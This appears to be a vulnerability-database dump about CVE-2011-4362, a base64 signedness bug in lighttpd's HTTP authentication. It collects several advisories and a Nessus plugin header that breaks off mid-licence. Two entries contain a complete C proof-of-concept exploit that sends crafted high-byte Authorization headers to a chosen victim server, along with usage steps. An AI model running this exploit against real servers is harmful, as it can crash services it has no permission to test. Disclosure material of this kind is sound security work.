"CVE-2011-4362\r\n\r\nLighttpd\u662f\u4e00\u6b3e\u8f7b\u578b\u7684\u5f00\u653e\u6e90\u7801Web Server\u8f6f\u4ef6\u5305\u3002\r\n\r\nlighttpd\u5728\u8ba4\u8bc1\u6570\u636e\u7684\u89e3\u7801\u5b9e\u73b0\u4e0a\u5b58\u5728\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u53ef\u80fd\u5229\u7528\u6b64\u6f0f\u6d1e\u4f7f\u5e94\u7528\u7a0b\u5e8f\u5d29\u6e83\u9020\u6210\u62d2\u7edd\u670d\u52a1\u3002\r\n\r\nhttp_auth.c\u4e2d\u7684\u4ee3\u7801\u5728base64\u89e3\u7801\u7528\u6237\u8f93\u5165\u7684\u8ba4\u8bc1\u6570\u636e\u65f6\u4f7f\u7528"const char *in"\u7c7b\u578b\uff0c\u5e76\u5c06\u6bcf\u4e2a\u5b57\u7b26\u8f6c\u6362\u4e3a"int ch"\u4f5c\u4e3a\u6620\u5c04\u8868\u7684\u7d22\u5f15\uff0c\u5927\u4e8e0x80\u7684\u5b57\u7b26\u5c31\u4f1a\u5bfc\u81f4\u8d1f\u7d22\u5f15\uff0c\u53ef\u80fd\u9020\u6210\u975e\u6cd5\u5185\u5b58\u8bbf\u95ee\u3002\r\n\r\nlighttpd 
<=1.4.29\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nLightTPD\r\n--------\r\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u8fd9\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8bf7\u5230\u5382\u5546\u7684\u4e3b\u9875\u4e0b\u8f7d\uff1a\r\n\r\nhttp://www.lighttpd.net/", "published": "2011-12-01T00:00:00", "title": "lighttpd mod_auth\u6a21\u5757base64 \u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4362"], "modified": "2011-12-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-24275", "id": "SSV:24275", "sourceData": "\n ---\r\nstatic const short base64_reverse_table[256] = ...;\r\nstatic unsigned char * base64_decode(buffer *out, const char *in) {\r\n ...\r\n int ch, ...;\r\n size_t i;\r\n ...\r\n \r\n ch = in[i];\r\n ...\r\n ch = base64_reverse_table[ch];\r\n ...\r\n}\r\n---\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-24275"}, {"lastseen": "2017-11-19T17:56:15", "description": "No description provided by source.", "published": "2011-12-27T00:00:00", "type": "seebug", "title": "Lighttpd 1.4.30 / 1.5 Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4362"], "modified": "2011-12-27T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-26120", "id": "SSV:26120", "sourceData": "\n /*\r\n *Lighttpd versions before 1.4.30 and 1.5 before SVN revision 2806 out-of-bounds read segmentation fault denial of service exploit.\r\n * Primitive Lighttpd Proof of Concept code for CVE-2011-4362 vulnerability discovered by Xi Wang\r\n *\r\n * Here the vulnerable code (src/http_auth.c:67)\r\n *\r\n * --- CUT ---\r\n * static const short base64_reverse_table[256] = {\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x00 - 0x0F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x10 - 0x1F\r\n * -1, -1, -1, -1, -1, -1, -1, 
-1, -1, -1, -1, 62, -1, -1, -1, 63, /* 0x20 - 0x2F\r\n * 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, -1, -1, -1, -1, -1, -1, /* 0x30 - 0x3F\r\n * -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, /* 0x40 - 0x4F\r\n * 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, -1, -1, -1, -1, -1, /* 0x50 - 0x5F\r\n * -1, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, /* 0x60 - 0x6F\r\n * 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, -1, -1, -1, -1, -1, /* 0x70 - 0x7F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x80 - 0x8F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0x90 - 0x9F\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xA0 - 0xAF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xB0 - 0xBF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xC0 - 0xCF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xD0 - 0xDF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xE0 - 0xEF\r\n * -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, /* 0xF0 - 0xFF\r\n * };\r\n *\r\n * static unsigned char * base64_decode(buffer *out, const char *in) {\r\n * ...\r\n * int ch, ...;\r\n * size_t i;\r\n * ...\r\n * \r\n * ch = in[i];\r\n * ...\r\n * ch = base64_reverse_table[ch];\r\n * ...\r\n * }\r\n * --- CUT ---\r\n *\r\n * Because variable 'in' is type 'char', characters above 0x80 lead to negative indices.\r\n * This vulnerability may lead out-of-boud read and theoretically cause Segmentation Fault\r\n * (Denial of Service attack). Unfortunately I couldn't find any binaries where .rodata\r\n * section before the base64_reverse_table table cause this situation.\r\n *\r\n * I have added some extra debug in the lighttpd source code to see if this vulnerability is\r\n * executed correctly. Here is output for one of the example:\r\n *\r\n * --- CUT ---\r\n * ptr[0x9a92c48] size[0xc0] used[0x0]\r\n * 127(. 
| 0 | 0)\r\n * -128(t | 1 | 0)\r\n * -127(e | 2 | 1)\r\n * -126(' | 3 | 2)\r\n * -125(e | 4 | 3)\r\n * -124(u | 5 | 3)\r\n * -123(r | 6 | 4)\r\n * -122(' | 7 | 5)\r\n * -121(s | 8 | 6)\r\n * -120(c | 9 | 6)\r\n * -119(i | 10 | 7)\r\n * -118(n | 11 | 8)\r\n * -117(i | 12 | 9)\r\n * -116( | 13 | 9)\r\n * -115(a | 14 | 10)\r\n * -114(t | 15 | 11)\r\n * -113(. | 16 | 12)\r\n * -112(e | 17 | 12)\r\n * -111(u | 18 | 13)\r\n * -110(r | 19 | 14)\r\n * -109(' | 20 | 15)\r\n * -108(f | 21 | 15)\r\n * -107(i | 22 | 16)\r\n * -106(e | 23 | 17)\r\n * -105(: | 24 | 18)\r\n * -104(= | 25 | 18)\r\n * -103(o | 26 | 19)\r\n * -102(t | 27 | 20)\r\n * -101(o | 28 | 21)\r\n * -100( | 29 | 21)\r\n * -99(a | 30 | 22)\r\n * -98(g | 31 | 23)\r\n * -97(. | 32 | 24)\r\n * -96(d | 33 | 24)\r\n * -95(g | 34 | 25)\r\n * -94(s | 35 | 26)\r\n * -93(: | 36 | 27)\r\n * -92(u | 37 | 27)\r\n * -91(s | 38 | 28)\r\n * -90(p | 39 | 29)\r\n * -89(o | 40 | 30)\r\n * -88(t | 41 | 30)\r\n * -87(d | 42 | 31)\r\n * -86(b | 43 | 32)\r\n * -85(c | 44 | 33)\r\n * -84(e | 45 | 33)\r\n * -83(d | 46 | 34)\r\n * -82(( | 47 | 35)\r\n * -81(n | 48 | 36)\r\n * -80(y | 49 | 36)\r\n * -79(h | 50 | 37)\r\n * -78(d | 51 | 38)\r\n * -77(g | 52 | 39)\r\n * -76(s | 53 | 39)\r\n * -75( | 54 | 40)\r\n * -74(r | 55 | 41)\r\n * -73(p | 56 | 42)\r\n * -72(a | 57 | 42)\r\n * -71(n | 58 | 43)\r\n * -70(. | 59 | 44)\r\n * -69(. | 60 | 45)\r\n * -68(d | 61 | 45)\r\n * -67(g | 62 | 46)\r\n * -66(s | 63 | 47)\r\n * -65(: | 64 | 48)\r\n * -64(( | 65 | 48)\r\n * -63(d | 66 | 49)\r\n * -62(- | 67 | 50)\r\n * -61(e | 68 | 51)\r\n * -60(s | 69 | 51)\r\n * -59( | 70 | 52)\r\n * -58(i | 71 | 53)\r\n * -57(s | 72 | 54)\r\n * -56(n | 73 | 54)\r\n * -55( | 74 | 55)\r\n * -54(i | 75 | 56)\r\n * -53(l | 76 | 57)\r\n * -52(. | 77 | 57)\r\n * -51(. 
| 78 | 58)\r\n * -50(k | 79 | 59)\r\n * -49(0 | 80 | 60)\r\n * -48(% | 81 | 60)\r\n * -47(] | 82 | 61)\r\n * -46(p | 83 | 62)\r\n * -45(r | 84 | 63)\r\n * -44(0 | 85 | 63)\r\n * -43(% | 86 | 64)\r\n * -42(] | 87 | 65)\r\n * -41(s | 88 | 66)\r\n * -40(z | 89 | 66)\r\n * -39([ | 90 | 67)\r\n * -38(x | 91 | 68)\r\n * -37(x | 92 | 69)\r\n * -36( | 93 | 69)\r\n * -35(s | 94 | 70)\r\n * -34(d | 95 | 71)\r\n * -33(0 | 96 | 72)\r\n * -32(% | 97 | 72)\r\n * -31(] | 98 | 73)\r\n * -30(. | 99 | 74)\r\n * -29(. | 100 | 75)\r\n * -28(d | 101 | 75)\r\n * -27(c | 102 | 76)\r\n * -26(d | 103 | 77)\r\n * -25(i | 104 | 78)\r\n * -24(g | 105 | 78)\r\n * -23(b | 106 | 79)\r\n * -22(s | 107 | 80)\r\n * -21(6 | 108 | 81)\r\n * -20(- | 109 | 81)\r\n * -19(t | 110 | 82)\r\n * -18(i | 111 | 83)\r\n * -17(g | 112 | 84)\r\n * -16(f | 113 | 84)\r\n * -15(i | 114 | 85)\r\n * -14(e | 115 | 86)\r\n * -13(. | 116 | 87)\r\n * -12(. | 117 | 87)\r\n * -11(. | 118 | 88)\r\n * -10(. | 119 | 89)\r\n * -9(. | 120 | 90)\r\n * -8(. | 121 | 90)\r\n * -7(. | 122 | 91)\r\n * -6(. | 123 | 92)\r\n * -5(. | 124 | 93)\r\n * -4(. | 125 | 93)\r\n * -3(. | 126 | 94)\r\n * -2(. | 127 | 95)\r\n * -1(. | 128 | 96)\r\n * k[0x60] ptr[0x9a92c48] size[0xc0] used[0x0]\r\n * ptr[0x9a92c48] size[0xc0] used[0x60]\r\n * string [.Yg.\\...n.Xt.]r.ze.....g.Y..\\..Yb.Y(..d..r.[..Y...-.xi..i.]\r\n * --- CUT ---\r\n *\r\n * First column is the offset so vulnerability is executed like it should be\r\n * (negative offsets). 
Second column is byte which is read out-of-bound.\r\n *\r\n *\r\n * Maybe you can find vulnerable binary?\r\n *\r\n *\r\n * Best regards,\r\n * Adam 'pi3' Zabrocki\r\n *\r\n *\r\n * --\r\n * http://pi3.com.pl\r\n * http://site.pi3.com.pl/exp/p_cve-2011-4362.c\r\n * http://blog.pi3.com.pl/?p=277\r\n *\r\n */\r\n\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <netdb.h>\r\n#include <netinet/in.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <getopt.h>\r\n\r\n#define PORT 80\r\n#define SA struct sockaddr\r\n\r\nchar header[] =\r\n"GET /%s/ HTTP/1.1\\r\\n"\r\n"Host: %s\\r\\n"\r\n"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0.1) Gecko/20100101 Firefox/8.0.1\\r\\n"\r\n"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n"\r\n"Accept-Language: pl,en-us;q=0.7,en;q=0.3\\r\\n"\r\n"Accept-Encoding: gzip, deflate\\r\\n"\r\n"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\\r\\n"\r\n"Proxy-Connection: keep-alive\\r\\n"\r\n"Authorization: Basic ";\r\n\r\nchar header_port[] =\r\n"GET /%s/ HTTP/1.1\\r\\n"\r\n"Host: %s:%d\\r\\n"\r\n"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:8.0.1) Gecko/20100101 Firefox/8.0.1\\r\\n"\r\n"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n"\r\n"Accept-Language: pl,en-us;q=0.7,en;q=0.3\\r\\n"\r\n"Accept-Encoding: gzip, deflate\\r\\n"\r\n"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\\r\\n"\r\n"Proxy-Connection: keep-alive\\r\\n"\r\n"Authorization: Basic ";\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n\r\n int i=PORT,opt=0,sockfd;\r\n char *remote_dir = NULL;\r\n char *r_hostname = NULL;\r\n struct sockaddr_in servaddr;\r\n struct hostent *h = NULL;\r\n char *buf;\r\n unsigned int len = 0x0;\r\n\r\n\r\n if (!argv[1])\r\n usage(argv[0]);\r\n\r\n\r\n printf("\\n\\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\\n");\r\n printf("\\n\\t\\t[+] Preparing arguments... 
");\r\n while((opt = getopt(argc,argv,"h:d:p:?")) != -1) {\r\n switch(opt) {\r\n\r\n case 'h':\r\n\r\n r_hostname = strdup(optarg);\r\n if ( (h = gethostbyname(r_hostname))==NULL) {\r\n printf("Gethostbyname() field!\\n");\r\n exit(-1);\r\n }\r\n break;\r\n\r\n case 'p':\r\n\r\n i=atoi(optarg);\r\n break;\r\n\r\n case 'd':\r\n\r\n remote_dir = strdup(optarg);\r\n break;\r\n\r\n case '?':\r\n\r\n usage(argv[0]);\r\n break;\r\n\r\n default:\r\n\r\n usage(argv[0]);\r\n break;\r\n\r\n }\r\n }\r\n\r\n if (!remote_dir || !h) {\r\n usage(argv[0]);\r\n exit(-1);\r\n }\r\n\r\n servaddr.sin_family = AF_INET;\r\n servaddr.sin_port = htons(i);\r\n servaddr.sin_addr = *(struct in_addr*)h->h_addr;\r\n\r\n len = strlen(header_port)+strlen(remote_dir)+strlen(r_hostname)+512;\r\n if ( (buf = (char *)malloc(len)) == NULL) {\r\n printf("malloc() :(\\n");\r\n exit(-1);\r\n }\r\n memset(buf,0x0,len);\r\n\r\n if (i != 80)\r\n snprintf(buf,len,header_port,remote_dir,r_hostname,i);\r\n else\r\n snprintf(buf,len,header,remote_dir,r_hostname);\r\n\r\n for (i=0;i<130;i++)\r\n buf[strlen(buf)] = 127+i;\r\n\r\n buf[strlen(buf)] = '\\r';\r\n buf[strlen(buf)] = '\\n';\r\n buf[strlen(buf)] = '\\r';\r\n buf[strlen(buf)] = '\\n';\r\n\r\n printf("OK\\n\\t\\t[+] Creating socket... ");\r\n if ( (sockfd=socket(AF_INET,SOCK_STREAM,0)) < 0 ) {\r\n printf("Socket() error!\\n");\r\n exit(-1);\r\n }\r\n\r\n printf("OK\\n\\t\\t[+] Connecting to [%s]... ",r_hostname);\r\n if ( (connect(sockfd,(SA*)&servaddr,sizeof(servaddr)) ) < 0 ) {\r\n printf("Connect() error!\\n");\r\n exit(-1);\r\n }\r\n\r\n printf("OK\\n\\t\\t[+] Sending dirty packet... 
");\r\n// write(1,buf,strlen(buf));\r\n write(sockfd,buf,strlen(buf));\r\n\r\n printf("OK\\n\\n\\t\\t[+] Check the website!\\n\\n");\r\n\r\n close(sockfd);\r\n\r\n}\r\n\r\nint usage(char *arg) {\r\n\r\n printf("\\n\\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...\\n");\r\n printf("\\n\\tUsage: %s <options>\\n\\n\\t\\tOptions:\\n",arg);\r\n printf("\\t\\t\\t -v <victim>\\n\\t\\t\\t -p <port>\\n\\t\\t\\t -d <remote_dir_for_auth>\\n\\n");\r\n exit(0);\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-26120", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-11-19T13:25:09", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "type": "seebug", "title": "lighttpd Denial of Service Vulnerability PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-4362"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-72453", "id": "SSV:72453", "sourceData": "\n 29 November 2011 was the date of public disclosure of an interesting\r\nvulnerability in the lighttpd server. Xi Wang discovered that mod_auth\r\nfor this server does not properly decode characters from the extended\r\nASCII table. 
The vulnerable code is below:\r\n\r\n\r\n"src/http_auth.c:67"\r\n--- CUT ---\r\nstatic const short base64_reverse_table[256] = ...;\r\nstatic unsigned char * base64_decode(buffer *out, const char *in) {\r\n\t...\r\n\tint ch, ...;\r\n\tsize_t i;\r\n\t...\r\n\r\n\t\tch = in[i];\r\n\t\t...\r\n\t\tch = base64_reverse_table[ch];\r\n\t...\r\n}\r\n--- CUT ---\r\n\r\nBecause variable 'in' is type 'char', characters above 0x80 lead to\r\nnegative indices.\r\nThis vulnerability may lead out-of-boud read and theoretically cause\r\nSegmentation Fault (Denial of Service attack).\r\nUnfortunately I couldn't find any binaries where .rodata section before\r\nthe base64_reverse_table\r\ntable cause this situation.\r\n\r\nI have added some extra debug in the lighttpd source code to see if this\r\nvulnerability is\r\nexecuted correctly. Here is output for one of the example:\r\n\r\n--- CUT ---\r\nptr[0x9a92c48] size[0xc0] used[0x0]\r\n127(. | 0 | 0)\r\n-128(t | 1 | 0)\r\n-127(e | 2 | 1)\r\n-126(' | 3 | 2)\r\n-125(e | 4 | 3)\r\n-124(u | 5 | 3)\r\n-123(r | 6 | 4)\r\n-122(' | 7 | 5)\r\n-121(s | 8 | 6)\r\n-120(c | 9 | 6)\r\n-119(i | 10 | 7)\r\n-118(n | 11 | 8)\r\n-117(i | 12 | 9)\r\n-116( | 13 | 9)\r\n-115(a | 14 | 10)\r\n-114(t | 15 | 11)\r\n-113(. | 16 | 12)\r\n-112(e | 17 | 12)\r\n-111(u | 18 | 13)\r\n-110(r | 19 | 14)\r\n-109(' | 20 | 15)\r\n-108(f | 21 | 15)\r\n-107(i | 22 | 16)\r\n-106(e | 23 | 17)\r\n-105(: | 24 | 18)\r\n-104(= | 25 | 18)\r\n-103(o | 26 | 19)\r\n-102(t | 27 | 20)\r\n-101(o | 28 | 21)\r\n-100( | 29 | 21)\r\n-99(a | 30 | 22)\r\n-98(g | 31 | 23)\r\n-97(. 
| 32 | 24)\r\n-96(d | 33 | 24)\r\n-95(g | 34 | 25)\r\n-94(s | 35 | 26)\r\n-93(: | 36 | 27)\r\n-92(u | 37 | 27)\r\n-91(s | 38 | 28)\r\n-90(p | 39 | 29)\r\n-89(o | 40 | 30)\r\n-88(t | 41 | 30)\r\n-87(d | 42 | 31)\r\n-86(b | 43 | 32)\r\n-85(c | 44 | 33)\r\n-84(e | 45 | 33)\r\n-83(d | 46 | 34)\r\n-82(( | 47 | 35)\r\n-81(n | 48 | 36)\r\n-80(y | 49 | 36)\r\n-79(h | 50 | 37)\r\n-78(d | 51 | 38)\r\n-77(g | 52 | 39)\r\n-76(s | 53 | 39)\r\n-75( | 54 | 40)\r\n-74(r | 55 | 41)\r\n-73(p | 56 | 42)\r\n-72(a | 57 | 42)\r\n-71(n | 58 | 43)\r\n-70(. | 59 | 44)\r\n-69(. | 60 | 45)\r\n-68(d | 61 | 45)\r\n-67(g | 62 | 46)\r\n-66(s | 63 | 47)\r\n-65(: | 64 | 48)\r\n-64(( | 65 | 48)\r\n-63(d | 66 | 49)\r\n-62(- | 67 | 50)\r\n-61(e | 68 | 51)\r\n-60(s | 69 | 51)\r\n-59( | 70 | 52)\r\n-58(i | 71 | 53)\r\n-57(s | 72 | 54)\r\n-56(n | 73 | 54)\r\n-55( | 74 | 55)\r\n-54(i | 75 | 56)\r\n-53(l | 76 | 57)\r\n-52(. | 77 | 57)\r\n-51(. | 78 | 58)\r\n-50(k | 79 | 59)\r\n-49(0 | 80 | 60)\r\n-48(% | 81 | 60)\r\n-47(] | 82 | 61)\r\n-46(p | 83 | 62)\r\n-45(r | 84 | 63)\r\n-44(0 | 85 | 63)\r\n-43(% | 86 | 64)\r\n-42(] | 87 | 65)\r\n-41(s | 88 | 66)\r\n-40(z | 89 | 66)\r\n-39([ | 90 | 67)\r\n-38(x | 91 | 68)\r\n-37(x | 92 | 69)\r\n-36( | 93 | 69)\r\n-35(s | 94 | 70)\r\n-34(d | 95 | 71)\r\n-33(0 | 96 | 72)\r\n-32(% | 97 | 72)\r\n-31(] | 98 | 73)\r\n-30(. | 99 | 74)\r\n-29(. | 100 | 75)\r\n-28(d | 101 | 75)\r\n-27(c | 102 | 76)\r\n-26(d | 103 | 77)\r\n-25(i | 104 | 78)\r\n-24(g | 105 | 78)\r\n-23(b | 106 | 79)\r\n-22(s | 107 | 80)\r\n-21(6 | 108 | 81)\r\n-20(- | 109 | 81)\r\n-19(t | 110 | 82)\r\n-18(i | 111 | 83)\r\n-17(g | 112 | 84)\r\n-16(f | 113 | 84)\r\n-15(i | 114 | 85)\r\n-14(e | 115 | 86)\r\n-13(. | 116 | 87)\r\n-12(. | 117 | 87)\r\n-11(. | 118 | 88)\r\n-10(. | 119 | 89)\r\n-9(. | 120 | 90)\r\n-8(. | 121 | 90)\r\n-7(. | 122 | 91)\r\n-6(. | 123 | 92)\r\n-5(. | 124 | 93)\r\n-4(. | 125 | 93)\r\n-3(. | 126 | 94)\r\n-2(. | 127 | 95)\r\n-1(. 
| 128 | 96)\r\nk[0x60] ptr[0x9a92c48] size[0xc0] used[0x0]\r\nptr[0x9a92c48] size[0xc0] used[0x60]\r\nstring [.Yg.\\...n.Xt.]r.ze.....g.Y..\\..Yb.Y(..d..r.[..Y...-.xi..i.]\r\n--- CUT ---\r\n\r\nFirst column is the offset so vulnerability is executed like it should be\r\n(negative offsets). Second column is byte which is read out-of-bound.\r\n\r\nHow to run this very primitive Proof of Concept?\r\n\r\n$ gcc p_cve-2011-4362.c -o p_cve-2011-4362\r\n$ ./p_cve-2011-4362 \r\n\r\n\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki)\r\n]=- :::...\r\n\r\n\tUsage: ./p_cve-2011-4362 <options>\r\n\r\n\t\tOptions:\r\n\t\t\t -v <victim>\r\n\t\t\t -p <port>\r\n\t\t\t -d <remote_dir_for_auth>\r\n\r\n$ ./p_cve-2011-4362 -h 127.0.0.1 -p 81 -d dupa\r\n\r\n\t...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki)\r\n]=- :::...\r\n\r\n\t\t[+] Preparing arguments... OK\r\n\t\t[+] Creating socket... OK\r\n\t\t[+] Connecting to [127.0.0.1]... OK\r\n\t\t[+] Sending dirty packet... 
OK\r\n\r\n\t\t[+] Check the website!\r\n\r\n$ \r\n\r\nLighttpd will log this situation probably in error-log file like this:\r\n\r\n--- CUT ---\r\n..\r\n..\r\n2011-12-xx xx:xx:11: (http_auth.c.887) : is missing in\r\n?Yg\\???n?Xt?]rze???gY??\\??Yb?Y(?d??r?[Y???-?xi??i?k?Wp?\t]???\\???@V??x???ize\r\n\r\n--- CUT ---\r\n\r\nMaybe you can find vulnerable binary?\r\n\r\nBest regards,\r\nAdam 'pi3' Zabrocki\r\n\r\n\r\n--\r\nhttp://pi3.com.pl\r\nhttp://www.exploit-db.com/sploits/p_cve-2011-4362.c\r\nhttp://blog.pi3.com.pl/?p=277\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-72453", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "amazon": [{"lastseen": "2020-11-10T12:36:42", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4362"], "description": "**Issue Overview:**\n\nInteger signedness error in the base64_decode function in the HTTP authentication functionality (http_auth.c) in lighttpd 1.4 before 1.4.30 and 1.5 before SVN revision 2806 allows remote attackers to cause a denial of service (segmentation fault) via crafted base64 input that triggers an out-of-bounds read with a negative index.\n\n \n**Affected Packages:** \n\n\nlighttpd\n\n \n**Issue Correction:** \nRun _yum update lighttpd_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n lighttpd-fastcgi-1.4.31-1.2.amzn1.i686 \n lighttpd-mod_mysql_vhost-1.4.31-1.2.amzn1.i686 \n lighttpd-debuginfo-1.4.31-1.2.amzn1.i686 \n lighttpd-mod_geoip-1.4.31-1.2.amzn1.i686 \n lighttpd-1.4.31-1.2.amzn1.i686 \n \n src: \n lighttpd-1.4.31-1.2.amzn1.src \n \n x86_64: \n lighttpd-fastcgi-1.4.31-1.2.amzn1.x86_64 \n lighttpd-debuginfo-1.4.31-1.2.amzn1.x86_64 \n lighttpd-1.4.31-1.2.amzn1.x86_64 \n lighttpd-mod_geoip-1.4.31-1.2.amzn1.x86_64 \n lighttpd-mod_mysql_vhost-1.4.31-1.2.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2012-07-09T14:20:00", "published": "2012-07-09T14:20:00", "id": "ALAS-2012-107", "href": "https://alas.aws.amazon.com/ALAS-2012-107.html", 
"title": "Medium: lighttpd", "type": "amazon", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4362"], "description": "Secure, fast, compliant and very flexible web-server which has been optimiz ed for high-performance environments. It has a very low memory footprint compa red to other webservers and takes care of cpu-load. Its advanced feature-set (FastCGI, CGI, Auth, Output-Compression, URL-Rewriting and many more) make it the perfect webserver-software for every server that is suffering load problems. ", "modified": "2012-06-26T00:31:28", "published": "2012-06-26T00:31:28", "id": "FEDORA:7030920B10", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: lighttpd-1.4.31-1.fc16", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4362"], "description": "Secure, fast, compliant and very flexible web-server which has been optimiz ed for high-performance environments. It has a very low memory footprint compa red to other webservers and takes care of cpu-load. Its advanced feature-set (FastCGI, CGI, Auth, Output-Compression, URL-Rewriting and many more) make it the perfect webserver-software for every server that is suffering load problems. 
", "modified": "2012-06-26T00:44:26", "published": "2012-06-26T00:44:26", "id": "FEDORA:B2BF02022D", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: lighttpd-1.4.31-1.fc17", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "nessus": [{"lastseen": "2021-01-07T10:49:51", "description": "US-CERT/NIST reports :\n\nInteger signedness error in the base64_decode function in the HTTP\nauthentication functionality (http_auth.c) in lighttpd 1.4 before\n1.4.30 and 1.5 before SVN revision 2806 allows remote attackers to\ncause a denial of service (segmentation fault) via crafted base64\ninput that triggers an out-of-bounds read with a negative index.", "edition": 24, "published": "2011-12-29T00:00:00", "title": "FreeBSD : lighttpd -- remote DoS in HTTP authentication (c6521b04-314b-11e1-9cf4-5404a67eef98)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4362"], "modified": "2011-12-29T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:lighttpd"], "id": "FREEBSD_PKG_C6521B04314B11E19CF45404A67EEF98.NASL", "href": "https://www.tenable.com/plugins/nessus/57411", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE 